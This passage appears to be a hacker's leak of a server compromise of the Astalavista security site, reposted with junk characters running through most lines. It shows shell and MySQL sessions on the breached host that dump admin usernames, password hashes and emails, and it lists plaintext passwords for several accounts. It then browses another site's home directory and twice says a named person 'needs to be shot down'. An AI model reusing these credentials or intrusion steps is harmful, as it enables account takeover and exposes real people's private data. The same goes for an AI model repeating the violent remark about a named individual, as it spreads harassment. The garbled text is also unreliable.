) e1 I7 v& _) T <description>All availably Exploits.</description>
7 S4 d$ p: f0 V S <language>en-us</language>
: N2 A# S( y2 D# a0 c <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
1 c6 d1 Q3 @7 B7 C3 @/ R <docs>http://blogs.law.harvard.edu/tech/rss</docs>
?/ N" Z& ?8 R! c6 h <generator>Astalavista.com</generator>
E* [+ J1 c, D: `! m <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
% m4 W4 p! M$ }; f% V </channel>
' f& R/ \& x- K* ^, [</rss>’;
5 V8 m2 w- i S, c
1 a. \) Y5 S5 _/ \7 z if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {4 n: m E' G. A7 }- `# E9 h3 p; a. j, [( P
unlink (FULLPATH . ‘/feed/exploits.xml’);1 ^$ K4 {5 v( {2 u J) P4 I
}7 s6 r2 l0 w" z# Y: q: O( V
! n" c3 W$ t' t C! `
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
- K9 ]4 F J H {[snip]
7 S+ y4 K( x `8 ~/ M: Z; {+ K7 G0 w! @% N5 r1 \) d, Z
sh-3.2$ cat exploits.sh# z! s! P, {$ T8 o% C9 c4 S) _
#!/bin/sh4 q3 h% O) F& N9 \" p
6 p& {4 z# t0 N4 K# X' B###########################################################( N6 w" u. x0 a7 H4 G7 ~3 Q$ z
# #8 a( A8 \. g8 \0 u
# Title: milw0rm exploits adder #% X3 i. F+ K- N3 I: L: n0 I9 j
# Description: Add all milw0rm exploits to the #
! X- G0 L* T, X7 O. B! M# R" ^# Astalavista.com database #
$ X. R: q7 i- I, G0 }# #/ l8 C E2 p; N
# Company: Astalavista Group #; B" v$ `7 x; E$ S
# Author: Paulo M. Santos #6 S! `6 r o# c4 R
# E-Mail: 链接标记paulo.santos@astalavista.ch #7 e7 q3 I$ l3 u' j
# #
1 C0 b+ ^0 J2 m) F###########################################################
|4 U) m8 \+ s3 C
. n# J- \" {$ O# path
( I( f+ H- {* N) e: L& U! A2 athis_path=/home/com/public_html/modifications/cronjobs
* f" I% \ w8 H2 h
; T5 U. U* O1 h! l, H$ G# change directory
& k6 H) s w8 P! @% T5 ecd $this_path7 D: K; k& n' O% n8 t4 D9 _
cd tmp/
7 [8 E/ t$ V; p N& d2 {( f6 x' q* ]# [& A( U2 i
# delete files- }( W9 y* p; |
rm -rf milw0rm.tar.* &
: Z* b2 W2 g2 J8 l# f7 f! srm -rf milw0rm/ & F! E/ l. A o
% i; ^2 U3 W( ?2 \$ X2 S; s
# wget milw0rm paket
" ]& j4 P a7 R" H" I: Pwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
8 O, H4 Y* t& f2 O4 C3 _+ B* a/ g& z0 K S6 t: G
# extract milw0rm paket
/ s1 z2 W$ d) x: @6 o2 ptar -xvf milw0rm.tar.bz2+ P3 I! ]: } B" s' d5 R
: n% i" D5 R# e6 k7 p6 _$ z# change owner
. h3 m: e' [8 p2 Q# nchown -R com .$ q' V$ K+ [ k U
chgrp -R com .& R' c9 v1 A0 c0 w: L; y& p
1 Q( i7 r7 d5 I" W9 T! p# execute php script9 [9 ~2 v8 G. l: T! ~& D3 _4 i) g
cd $this_path1 {7 c8 K: ^7 u& c
php -q exploits.php7 K2 e" B6 g X, `7 D* k7 E: R
. F4 B" D7 @" ?& Z: G# delete files
8 w# x7 s" v! z4 a4 p3 Q; M& t/ Frm -rf tmp/milw0rm.tar.*" e8 ?6 w. v' G5 ^ [7 a) t) J7 Y
rm -rf tmp/milw0rm/
# T2 Y: L* n' O7 w" P0 M! m
4 ~$ |( r: ^# T$ d2 p) m6 ^sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
+ e& k N! y) D' U) T% cPaulo M. Santos needs to be shot down.
5 Y: [" D. u3 O! f% c6 T
' ~4 X8 g, X* d$ q, ^mysql -u contrexxuser2 -p2 z% g% J& O' u- T: [
Enter password:
4 V: A9 s. ~+ b0 p: S) C/ UWelcome to the MySQL monitor. Commands end with ; or \g.
" B2 B6 a% i: x& {1 k% ~) j* k& XYour MySQL connection id is 261694$ l4 p! c. P3 b3 X# s
Server version: 5.0.45-community-log MySQL Community Edition (GPL)- X5 e. I1 R! t# T: K3 J# \
3 w1 _- Q& \! \& S& a3 b7 i yType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' v# l1 Y' E5 A6 d y4 s' J3 l% M) p
mysql> show databases;& Z( \( \& ?0 A) A2 m7 p" W0 @ {
+——————–+- D) W2 T3 B( Y% |% P, F% I
| Database |* ~5 v9 n Q+ |1 D% ~0 _' U j
+——————–+0 G( ?. ^/ F9 F! p/ @
| information_schema |
4 B+ P4 k3 s0 V) c0 T Y0 k| com_contrexx2 |/ V' G5 B4 V/ e. w* y
| com_contrexx2_live |& a- }2 e# J# S9 N. u5 e4 i6 x" b
| test |
/ t; C' O: E9 n' [5 u+——————–+) J0 c: v! d8 @# M
4 rows in set (0.00 sec)# \- J$ z# K/ L% S
* H; V( B! |# s! i) P
mysql> use com_contrexx2_live4 E, U7 V1 I. i' H5 \
Database changed& r3 Q6 N4 M# y( k. O
mysql> show tables;- l: T" {0 S% Z1 j; h# ~* R
+————————————————–+" [* a" ~; |+ T9 b+ [
| Tables_in_com_contrexx2_live |( T6 {8 o$ }% o
+————————————————–+2 k8 Q( |) u6 }- a
| cc_banner_counter |2 P% t( @- F* L1 Z* u
| cc_search_counter |
5 ^ R9 G+ q3 R+ T| contrexx_access_group_dynamic_ids |
1 G4 r* j: d3 u1 n, || contrexx_access_group_static_ids |7 b7 E8 L% o3 D1 s! k2 d" k( A5 g
| contrexx_access_rel_user_group |
- i5 a1 z2 T7 ^. T| contrexx_access_settings |3 ~8 K. l# A( P! e$ d8 \7 i
| contrexx_access_user_attribute |% b! Z/ w9 d! s$ G
| contrexx_access_user_attribute_name |
/ q: ^6 R; ] X1 \8 }' p| contrexx_access_user_attribute_value |
& }$ l# J7 ?, h| contrexx_access_user_core_attribute |% e' v6 X. L. T6 `+ Y: M1 p7 t
| contrexx_access_user_groups |
# | c! o. D% {$ c. b/ r| contrexx_access_user_mail |! ^+ x9 i# b- N& K1 E, w- ]' A
| contrexx_access_user_profile |! L) T+ V, {+ @# m- b+ v3 C1 t+ c
| contrexx_access_user_title |
6 E) W( t: G9 p/ h1 ~" i# a3 C| contrexx_access_user_validity |
! ]+ e+ D7 m! l+ i/ Z0 z5 Y5 o| contrexx_access_users |
$ [3 f* d9 C4 V; x" @ ?| contrexx_backend_areas |
: B1 n% e: z6 Z, { I+ d+ O' Y| contrexx_backups |
4 {+ `% t3 K2 r2 B: X| contrexx_content |
+ F7 e) z( p, ^% l! k| contrexx_content_history |+ c A4 `& U, z/ i' K& ]* X
| contrexx_content_logfile |! E1 O% M# P; t* P' a8 d
| contrexx_content_navigation |
0 Z4 H' e+ q7 |7 X1 Z' r| contrexx_content_navigation_history |
* }4 C `0 q) @* m: M| contrexx_ids |' [4 N' m# h( |/ j3 r1 w: Y) ~- u4 |
| contrexx_languages |
; h5 t: p4 v* \" I. g; D, z, d" Y| contrexx_lib_country |, _1 {9 u( [ e' m
| contrexx_log |4 n, i5 ], M. k% v
| contrexx_module_alias_source |( F, ~- y& z- S! y& [
| contrexx_module_alias_target |: e/ B8 f. e0 f8 R( {- g% g
| contrexx_module_block_blocks |( e/ J4 Q/ c) o- ]* j* K& Q# k
| contrexx_module_block_rel_lang |
d: H8 y. r! M# R5 P+ ^| contrexx_module_block_rel_pages |
5 q) @6 [, z, L1 h/ n: ?$ F% F5 F| contrexx_module_block_settings |; p$ h( [6 S& z! X
| contrexx_module_blog_categories |
+ l9 b# |& N: V/ g. O| contrexx_module_blog_comments |6 h/ h/ \" }. L$ w, x: Y
| contrexx_module_blog_message_to_category |* z! v% R$ G6 B- w5 p- {0 o
| contrexx_module_blog_messages |% H8 y( A: X9 f, w
| contrexx_module_blog_messages_lang |, D5 A! |/ B3 ]( X2 }. G
| contrexx_module_blog_networks |
) o1 U) {4 Z9 y# |5 ~+ f7 u$ x| contrexx_module_blog_networks_lang |7 [8 G7 J) r& l$ N/ z
| contrexx_module_blog_settings |
+ Z8 j. K! ^3 R5 F! [( {& D9 D4 p| contrexx_module_blog_votes |3 v# U; Y5 z0 T
| contrexx_module_calendar |
2 G7 W) ` H1 o' n/ Y/ a g7 B| contrexx_module_calendar_access |, t4 O t/ P( F7 G
| contrexx_module_calendar_categories |
# n9 t" t/ ~% K| contrexx_module_calendar_form_data |
[7 u" p& o$ C9 I+ K| contrexx_module_calendar_form_fields |" @# y$ \: Q7 T/ [8 S4 k
| contrexx_module_calendar_registrations |+ [2 s. c: f- ~/ \0 `+ c3 K
| contrexx_module_calendar_settings |) p' F; z- g3 E% D, F) `: U
| contrexx_module_calendar_style |1 s% M0 W, K. |& m' ]0 n
| contrexx_module_contact_form |
6 X/ A$ a0 W0 V/ a| contrexx_module_contact_form_data |
: s9 g9 @' d$ C' M| contrexx_module_contact_form_field |/ K7 j8 p, T. } f [. A% e' ]
| contrexx_module_contact_settings |1 b( A" c' u- a5 P2 w
| contrexx_module_data_categories |% p: }( r3 V8 j' h+ K4 E. h
| contrexx_module_data_message_to_category |
1 W2 a& N4 w( k| contrexx_module_data_messages |
; [& K ^& L4 @! I: U| contrexx_module_data_messages_lang |& M" S m+ b2 L- a
| contrexx_module_data_placeholders |
: q) }) K' t: \ E- `3 E| contrexx_module_data_settings |
2 [) w/ q9 L0 f6 Z2 G9 Z: {" J| contrexx_module_directory_access |
, U) G* L* r5 k( U( y* t g1 i| contrexx_module_directory_categories |, t, F8 ]5 m u- K' H# P
| contrexx_module_directory_dir |) f+ j9 i1 g& n( @# B0 [! K
| contrexx_module_directory_inputfields |
, g7 a6 v* S% D E& n1 u. P! S| contrexx_module_directory_levels |
4 w; l! j) \: n/ v| contrexx_module_directory_mail |) F4 C" P) Y$ Z! N" i$ f
| contrexx_module_directory_rel_dir_cat |
3 k2 w, Y) j+ ^$ D9 O, u. X| contrexx_module_directory_rel_dir_level |/ e* a$ U# e' B) D
| contrexx_module_directory_settings |' X) A G1 k6 R
| contrexx_module_directory_settings_google |
4 k9 ~( b% ]! y$ A1 \/ r! [. F| contrexx_module_directory_vote |1 F% l8 k3 H L1 r% |+ \6 q. @
| contrexx_module_docsys |
9 m" g& A, D- Q f" N* g9 ~| contrexx_module_docsys_categories |
8 s3 y! {5 ^& Q1 K$ q: w I| contrexx_module_egov_configuration |3 e' L7 W$ M4 m, r* z
| contrexx_module_egov_orders |( J; r0 w* K$ z7 n1 t @" K, L4 O
| contrexx_module_egov_product_calendar |/ c7 u$ c5 P0 v% Z( n
| contrexx_module_egov_product_fields |" \* M5 ?5 n* b8 F
| contrexx_module_egov_products |5 V9 }; T, J# j* e! O
| contrexx_module_egov_settings |
3 [% F8 W/ P o. K* X1 v! U0 O| contrexx_module_exploits |" L$ L. X6 A9 y& Y. |
| contrexx_module_exploits_categories |
7 t7 n ?. g2 X$ ~" [1 O9 ^| contrexx_module_feed_category |
3 z7 C0 r2 Y; _0 ~6 N" y* Q/ B/ \| contrexx_module_feed_news |
: O5 Y5 l; U& u6 F| contrexx_module_feed_newsml_association |1 M5 g1 e' E! S. |3 z* o) W& g. |
| contrexx_module_feed_newsml_categories |
1 a5 Q2 Z& w7 z2 f+ z" ~| contrexx_module_feed_newsml_documents |
: L5 m- e; f n! F$ K| contrexx_module_feed_newsml_providers |
9 x$ g z- c# d7 N! y I| contrexx_module_forum_access |
0 `% v4 {3 b5 ?0 m| contrexx_module_forum_categories |6 B! r# I% X+ c, L3 u0 S( Q4 |) {0 h
| contrexx_module_forum_categories_lang |# x1 f" n. }/ c% `2 v: g: l
| contrexx_module_forum_notification |
* ^7 s7 x4 L3 V+ D3 U; D* W6 C| contrexx_module_forum_postings |; b: n3 y5 I/ u) V: B' h
| contrexx_module_forum_rating |
2 s& O3 W K$ K1 L- G" I| contrexx_module_forum_settings |0 r+ O2 F5 H4 }& \- H9 n3 R
| contrexx_module_forum_statistics |
, L, S/ q: y4 n) o, _' ^| contrexx_module_gallery_categories |5 ?- H* X T: V0 k& {6 i9 V
| contrexx_module_gallery_comments |
! K% R5 Q/ J. k. R- C/ y| contrexx_module_gallery_language |* Q( z+ i; ^8 t6 C+ q) `( U2 c
| contrexx_module_gallery_language_pics |) f# w4 u* @7 {
| contrexx_module_gallery_pictures |7 k1 T8 j; \& I+ j$ x
| contrexx_module_gallery_settings |
4 t( D# n' x/ o' p' r0 z| contrexx_module_gallery_votes |6 c( ?3 G( P4 Q a3 N) V
| contrexx_module_guestbook |0 @* z& m! ~3 h* U; G
| contrexx_module_guestbook_settings |0 ~% |( P/ S4 _5 V2 q, v S
| contrexx_module_livecam |
: F, d- U; l5 H/ ]- g| contrexx_module_livecam_settings |! n* B% l2 B/ N8 w1 y& c
| contrexx_module_market |- ?' s3 }( ~' \8 n/ b
| contrexx_module_market_access |
* y, d, N" A; L# l. V5 W: O| contrexx_module_market_categories |
6 j5 D" Q& c+ f5 u* w3 Z0 S| contrexx_module_market_mail |
/ o+ d9 o3 Y! P6 E| contrexx_module_market_paypal |# o ~7 L) J; z S6 j r) t
| contrexx_module_market_settings |* V' D# D5 r6 g+ L0 ~. u1 z
| contrexx_module_market_spez_fields |- W0 Y: `/ A: U8 \) ]) }
| contrexx_module_mediadir_access |' F$ ~+ I! q: C/ z
| contrexx_module_mediadir_categories |
, r! a6 g) J$ o7 h| contrexx_module_mediadir_comments |, J/ D5 b7 ]( ]( ^$ d( T% s1 A" U
| contrexx_module_mediadir_dir |
+ V& @. i9 q4 N; X8 ?1 D| contrexx_module_mediadir_inputfields |
; o. u% p3 {8 B4 E$ ^| contrexx_module_mediadir_levels |9 w' {. }2 R M5 G( _
| contrexx_module_mediadir_mail |3 g; Y9 e" I0 e0 z9 b6 |, y% }( q
| contrexx_module_mediadir_rel_dir_cat |
- Z8 f3 p+ H) C( O: d| contrexx_module_mediadir_rel_dir_level |
/ b' q6 q' w" r2 t, @| contrexx_module_mediadir_reports |
( U+ m# y9 E- b5 {$ `% k| contrexx_module_mediadir_settings |1 i, I/ g* J0 O# d2 Y8 x6 N! e
| contrexx_module_mediadir_settings_google |
* S9 f$ ^9 f R- e| contrexx_module_mediadir_vote |1 H+ O {3 b4 S" p( T
| contrexx_module_memberdir_directories |5 Y& [+ \5 O& b; m7 m! }
| contrexx_module_memberdir_name |
* B% D7 p/ \3 w; }% ^) ^| contrexx_module_memberdir_settings |) K8 I, }: H7 r
| contrexx_module_memberdir_values |9 M: x1 T* j4 f
| contrexx_module_nettools_allowed_groups |9 N! ?7 C- h" X' y0 z1 q* A8 {
| contrexx_module_nettools_settings |5 O3 \, C1 d8 W' U2 s( a; G+ C9 ?9 u/ e
| contrexx_module_news |
. N& n! X1 l, v9 O+ c7 H8 V| contrexx_module_news_access |0 u0 c" T* k. s5 t- f7 G" Y
| contrexx_module_news_categories |
1 [! H0 A6 g) J/ K& x8 N| contrexx_module_news_settings |! s* z |% t2 x$ P" t) M5 v
| contrexx_module_news_teaser_frame |# C( b4 E, ^) F( F q, m8 y
| contrexx_module_news_teaser_frame_templates |
! E+ n: b+ W" h1 J& g| contrexx_module_news_ticker |
" j( P& H! X8 W$ k+ Z" {+ ~4 x| contrexx_module_newsletter |4 d" P5 r/ s+ a/ @1 m
| contrexx_module_newsletter_attachment |
$ r9 r. P! O/ n* O2 G% N| contrexx_module_newsletter_category |+ R% ~9 A2 F/ l: l
| contrexx_module_newsletter_confirm_mail |
" \& [7 L; D9 j' E* v| contrexx_module_newsletter_rel_cat_news |
. ?4 r; \; l% h* o' F: S, t& b| contrexx_module_newsletter_rel_user_cat |: _. p. V4 n% R" T0 ]: G
| contrexx_module_newsletter_settings | y1 i3 T$ z" q2 O( a5 V. h$ L
| contrexx_module_newsletter_template |( ~9 @' Q# d' _- [1 h% C! I9 z& }
| contrexx_module_newsletter_tmp_sending |5 a+ ? w' G5 x; {2 X
| contrexx_module_newsletter_user |
* K% U( P' K1 `% C4 i2 k| contrexx_module_newsletter_user_title |
4 G+ c. R* e! Z( x- u2 j| contrexx_module_onlinetools_defaultports |
# e, q0 f( h/ F8 t| contrexx_module_onlinetools_defaultports_back |
! \ M2 w# `9 C" m, [| contrexx_module_onlinetools_geolitecity_blocks |( Q e+ s$ s& ?' {2 A1 X/ L
| contrexx_module_onlinetools_geolitecity_country |! O( l% c+ z8 e7 y! Z' [
| contrexx_module_onlinetools_geolitecity_location |
3 J& }( i" H' m- A4 c: c; m5 v| contrexx_module_podcast_category |
3 o0 r! y! }; ~/ l6 d c| contrexx_module_podcast_medium |" g a# T: a" L, I# o
| contrexx_module_podcast_rel_category_lang |& J6 S4 F3 t5 z3 ^* W9 Z$ o. @+ @) T
| contrexx_module_podcast_rel_medium_category |
* u$ b$ c' ^: @9 K7 I& B| contrexx_module_podcast_settings |# R0 S" A2 b& T* l. l" ~1 o
| contrexx_module_podcast_template |+ k7 u9 S( D0 S# n5 m4 ?
| contrexx_module_proxydb |
2 f# v" R8 j& B$ I! L| contrexx_module_recommend |- ` U( @: _) Z
| contrexx_module_repository |
7 V% Z; {. b4 H# N% e/ N7 w| contrexx_module_securitynews_cats |
; @$ E. T, l+ w5 {/ G| contrexx_module_securitynews_feeds |1 W0 \! L; n8 M" f/ n4 g
| contrexx_module_securitynews_news |
4 d' x5 _" B: \5 X `; A8 y| contrexx_module_shop_categories |
* J/ i: N+ c! e| contrexx_module_shop_config |& s/ |) g* E8 w( Q. }/ }1 q6 S
| contrexx_module_shop_countries |
1 L6 p/ C/ l$ l2 ~5 m( ]| contrexx_module_shop_currencies |
/ y) P+ b/ x2 ]" w, b" M+ I2 H( M3 l| contrexx_module_shop_customers |7 F4 [% L8 m: z' \6 }0 X/ d. b
| contrexx_module_shop_importimg |/ D8 T6 I: _$ w' n7 b+ u) A9 w
| contrexx_module_shop_lsv |+ p7 S4 B( X* H$ l- S' [$ S4 X
| contrexx_module_shop_mail |
. ^+ w) v$ a' I: P+ Q| contrexx_module_shop_mail_content |6 f4 \) ?7 P1 }9 `
| contrexx_module_shop_manufacturer |
) @/ @) k7 Y- d3 u1 c| contrexx_module_shop_order_items |
: A6 b, n* E2 @5 k+ Y| contrexx_module_shop_order_items_attributes |
9 J$ Q- K# N" m& ~9 G* _2 h| contrexx_module_shop_orders |
" |: g2 P+ Y: N& D5 ?| contrexx_module_shop_payment |
7 m+ ^$ E+ [6 A" s9 x| contrexx_module_shop_payment_processors |2 _( K$ X/ C8 n4 h$ M+ c
| contrexx_module_shop_pricelists |
4 T K1 S, n; X! q7 i% {+ I' E| contrexx_module_shop_products |
# G6 R) x+ R7 o+ E/ R4 v6 Y| contrexx_module_shop_products_attributes |
a+ C6 D: _5 d| contrexx_module_shop_products_attributes_name |
2 b" n6 y- v$ V8 A4 ?| contrexx_module_shop_products_attributes_value |& I. m+ u1 O% D* c. S
| contrexx_module_shop_products_downloads |8 Q3 R. D" v9 f0 _6 F
| contrexx_module_shop_rel_countries |" P+ V4 u: @' p0 C4 s3 L
| contrexx_module_shop_rel_payment |
: ~8 g7 Y1 I" m| contrexx_module_shop_rel_shipment |
+ X* K8 `- K k' Q5 A( || contrexx_module_shop_shipment_cost |
. A) q8 [. n2 f- O| contrexx_module_shop_shipper |
1 Z. h' n+ D& y9 ]! Z5 k2 c| contrexx_module_shop_vat |
' F- t* G; I: Z( f, ]$ }8 F) r6 ?| contrexx_module_shop_zones |
# P i, w3 h7 [- C) i4 L| contrexx_module_u2u_address_list |
) x) L4 y: L9 v% n, o3 H7 u0 p$ z| contrexx_module_u2u_message_log |
0 c8 E4 j Y$ a# K| contrexx_module_u2u_sent_messages |( N6 { h: D9 V0 b& L- V; r5 s, }
| contrexx_module_u2u_settings |
7 d) u0 `% C4 E/ M| contrexx_module_u2u_user_log |
9 _6 t- N# Q$ I7 S| contrexx_modules | u0 o% I. Q, U' e- Z
| contrexx_sessions |
8 y, h7 e5 W9 g| contrexx_settings |
* _4 s3 P4 B& H| contrexx_settings_smtp |
6 s( v1 h- ~$ g$ P: z| contrexx_skins |4 r: l% O3 V4 e# w5 w1 `# K9 E( x
| contrexx_stats_browser |
! F1 n6 C! R; L+ b5 [ }/ _| contrexx_stats_colourdepth |
, a2 v* r3 j, Q, u* Y| contrexx_stats_config |8 @9 ]$ _8 s u1 p" Z
| contrexx_stats_country |; d q4 v6 ^4 v2 H T
| contrexx_stats_hostname |
8 o5 v( i% F8 P# S3 O| contrexx_stats_javascript |
% ~4 r5 Q5 x+ B. ?$ ~5 {, A| contrexx_stats_operatingsystem |, x6 f9 }" ]8 a! v4 @1 c# G
| contrexx_stats_referer | A% x1 @0 p4 z$ L9 `4 a( [# T
| contrexx_stats_requests |
2 g/ c7 q8 D- G| contrexx_stats_requests_summary |
, E# b$ B6 G) G6 K) S8 ^| contrexx_stats_screenresolution |
- O+ {. a& a* C$ R1 S! W| contrexx_stats_search |! u$ U" O# s$ g; B$ u) h
| contrexx_stats_spiders |
+ O' N8 M7 |# m$ l| contrexx_stats_spiders_summary |, s' L4 l! t$ `
| contrexx_stats_visitors |
: B" g U8 f+ {$ B) k9 ~& e% s| contrexx_stats_visitors_summary |( O/ N4 M$ @/ @/ R q* y; e. w
| contrexx_voting_additionaldata |
6 K5 F0 }' K O4 J. T& d| contrexx_voting_email |
5 b9 `. y5 H, g* ?! @& ^/ u| contrexx_voting_rel_email_system |( x1 ?9 e) K1 a8 q6 O i9 h- U8 U
| contrexx_voting_results |
% F1 T; h Z" B. R| contrexx_voting_system |( V: G, A* o& z" o# t6 J
| foo |
7 @1 F* F Z# c! z' x) k+————————————————–+5 Z4 Y7 D* t4 H% b
227 rows in set (0.01 sec)
9 m, I4 ^& H% `4 s; i9 c# ^9 |5 \) j6 K: z1 q& x
mysql> select count(*) as skids from contrexx_access_users;% Z# R) `( r5 U% F
+——-+% q* I1 a) M1 ^3 X8 ]: A. _
| skids |
; |4 L9 s' N7 {; \# _( q5 O J& M+——-+
+ w( r/ w0 C/ R* Q5 r| 53699 |# x. X, h, C \/ ]8 g. l
+——-+( e: C0 L0 T1 j
1 row in set (0.00 sec)
% M9 a/ U a6 {5 `( Z5 a2 d6 Q% |! J+ B5 \7 e9 D& u# Z
mysql> describe contrexx_access_users;6 Q6 N8 D; g* M$ S& }9 I
+——————+——————————————+——+—–+————–+—————-+
6 v$ ]4 q9 L5 J% ^| Field | Type | Null | Key | Default | Extra |4 V! l' K6 S6 D1 ^8 s
+——————+——————————————+——+—–+————–+—————-+
- ?$ l1 w( N# d. i' A" b) x. Q| id | int(10) unsigned | NO | PRI | NULL | auto_increment |+ t9 b2 g! t4 T& Y. E3 |7 Z* |
| is_admin | tinyint(1) unsigned | NO | | 0 | |
- C1 n( p4 Z$ D! x6 F8 H! `| username | varchar(40) | YES | MUL | NULL | |
' E5 j* V5 l. h# q5 u5 `6 Q8 \6 z| password | varchar(32) | YES | | NULL | | M: m' w9 p2 ^# r1 x& A
| regdate | int(14) unsigned | NO | | 0 | |
5 _" s* F; {% l| expiration | int(14) unsigned | NO | | 0 | |5 ~* w& }3 z, b; Z) I9 O
| validity | int(10) unsigned | NO | | 0 | |
+ M' n' S* ?) x2 e; i. V2 u. U| last_auth | int(14) unsigned | NO | | 0 | |
0 |( `! O9 {. j3 d0 T; Q: ^+ E) A| last_activity | int(14) unsigned | NO | | 0 | |' R8 Z, S4 q# j+ E% _ X9 w: K9 j
| email | varchar(255) | YES | | NULL | |: ]; h( \' s a4 h
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
/ o, U% d9 J y+ ]0 [* M* C| frontend_lang_id | int(2) unsigned | NO | | 0 | |+ R: F" h% w5 E- W
| backend_lang_id | int(2) unsigned | NO | | 0 | |
2 W# p: Y$ q4 t, m( m| active | tinyint(1) | NO | | 0 | |
0 E; W! t/ Q2 L4 d, f+ t| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
! ?! i. f& t1 O; c| restore_key | varchar(32) | NO | | | |, c |8 B% w5 G/ K
| restore_key_time | int(14) unsigned | NO | | 0 | |
- r# K" t# x2 s' n& X5 r8 || u2u_active | enum(’0′,’1′) | NO | | 1 | |
, w8 b" y; I9 K4 P$ M+——————+——————————————+——+—–+————–+—————-+1 R; D( @ g, O G6 ?4 I
18 rows in set (0.00 sec)7 E$ c' g$ m1 D
9 {4 `% D$ H' C W2 ]mysql> select username,password,email from contrexx_access_users where is_admin = 1;( N. S6 B2 Z9 u; D
+————+———————————-+—————————–+
+ I( z6 q" A9 E1 [| username | password | email |6 e" Y5 a9 `+ Y! W
+————+———————————-+—————————–+, ~# u. F2 j# q
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |: O9 T) v( I% P/ V6 I. ^% d! A) J
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
1 W6 s7 v d; B7 a| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |2 p5 M6 F3 Z1 ^+ X2 k
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |! b. {" r! G" a0 ]; ]
+————+———————————-+—————————–+# Q+ Z% K: p4 J% B
4 rows in set (0.04 sec)7 E) v- S$ j: Y2 @6 y9 Z5 a$ ?! W
! P( }0 K' K; F/ s1 n2 {4 p5 U F" O
mysql> exit;7 j7 q! {0 y% A) R7 N
Bye
5 r9 u& Z+ \! k1 X4 _+ Q9 Y& g, ~5 T8 `8 q" H, N' k
[~] There you go, your “team of security and IT professionals” is a joke.5 d/ o8 Z. d$ S! `: O- x% ]4 _
/ S. ?1 u$ Q$ H' M p$ ?1 B: K3 h# k+——————————+
/ {+ z; T' {4 [( p. Jsystem:f82BN3+_* j2 n: o/ d( L/ P! ` g' D
Be1er0ph0r:belerophor4astacom. C7 |" q% }' C9 a5 f2 G9 d8 s) H& D. T3 s
prozac:asta4cms!! j+ c: v2 o9 \
commander:mpbdaagf6m0 w& h5 Z' v( i
sykadul:ak29eral
' B4 z( _2 _ C3 n+——————————+- |. Z. {7 x) i1 D
. ]$ r: u7 }7 n5 c& |[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)$ g, { O- t) f! f0 M- c4 z- C
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.- i4 h+ L9 a6 ^ Z3 M( B; L! F/ ^0 P
: u" E, x% k' a" O[~] Lets move to astalavista.net now,
$ _! Z8 A/ V5 F9 m% s" p- I% ~
: ]8 h' k) K+ U5 U) BFrom <链接标记[url]https://www.astalavista.net/[/url]>:- ?2 |4 n: z$ S, c
>> Everyone knows that the best defense is a good offense.
* ~$ I) k7 K" K/ e/ t- ?6 N>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
9 G O8 a3 q- i. y1 K7 ]5 Q>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.& d `! }) Y- `' v6 G! Y
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
3 V) H9 P- b. }4 v: \ ?2 e& P1 [- q4 ]) Z/ I! b: n
>> Go ahead, try and hack our server . in a completely legal way!9 }+ } }. j a
>> Learn by doing: We offer our members tricky tasks and challenges on an
% T' |4 T m/ g9 _$ ~7 c>> ongoing basis so you can test your knowledge and abilities. You can also; s0 u( e, w4 u1 g
>> demonstrate what you.ve mastered by taking part in regular hacker contests* k, j, U z, w2 t- f2 S7 l
>> and war games
4 F a9 M+ a) H, ~( F- G
, w# B% [. j* e. E% o[~] Lets take a look there, after all… they are hack-proof, aren’t they?!" m. Y8 ^+ O) y g/ T
3 [1 T2 k5 o7 t- x/ }: N[-] Tricky task: Find home dir of astalavista.net
' o/ O* U: D) [+ y1 T9 b' ^! r* i2 W X1 Q; q
sh-3.2$ ls -la ~astanet* L: P* d# r6 b$ _
total 48
1 r: v! H: E q0 z5 L( g$ c; _$ ]drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ." s3 q1 j3 T! v; u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& x% A5 q% j+ I1 G) e$ D+ `drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth6 M! Q/ {0 }+ N+ I0 u& O9 k5 H
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
' J- O+ g5 c. R J" N3 s-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout. F+ v0 m4 o8 m4 u/ F' y; O8 c- {
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
I. J! v: T2 ~0 b$ O, q+ q9 }-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
, s+ ~# f- C& T/ R9 v+ G- Vdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
8 w5 z7 Z3 X8 r1 T( }7 P R4 O- kdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap! ^ H+ w7 F u3 Z6 O
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 u9 X# v$ o! Q" }7 Y! Slrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html h! E9 C; R! c- x
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
! o, O: l6 e9 K0 m( W
: t( s' L4 l2 B" ?7 I- e5 ^sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/1 S3 p% V% g6 W
sh-3.2$ ls -la
/ o8 @' u4 S/ v2 Ltotal 2007 j/ \- U$ H* n" p3 D0 R
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
